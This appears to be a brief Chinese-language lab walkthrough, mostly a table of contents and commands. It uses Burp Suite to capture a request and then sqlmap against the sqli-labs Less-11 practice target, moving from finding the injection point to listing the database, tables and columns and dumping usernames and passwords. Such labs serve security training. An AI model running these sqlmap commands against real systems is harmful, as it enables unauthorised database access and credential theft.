目录
Burpsuite抓包
Sqlmap判断注入点
python2 sqlmap.py -r D:\SecureTool\phpstudy_pro\WWW\sqli-labs-master\Less-11\use.txt - --batch
爆破数据
【第一步:查询当前数据库】
python2 sqlmap.py -r D:\SecureTool\phpstudy_pro\WWW\sqli-labs-master\Less-11\use.txt - --batch --current-db
【第二步:查询表】
python2 sqlmap.py -r D:\SecureTool\phpstudy_pro\WWW\sqli-labs-master\Less-11\use.txt - --batch -D security --tables
【第三步:查询列名】
python2 sqlmap.py -r D:\SecureTool\phpstudy_pro\WWW\sqli-labs-master\Less-11\use.txt - --batch -D security -T users --column
【第四步:查询内容】
python2 sqlmap.py -r D:\SecureTool\phpstudy_pro\WWW\sqli-labs-master\Less-11\use.txt - --batch -D security -T users -C username,password --dump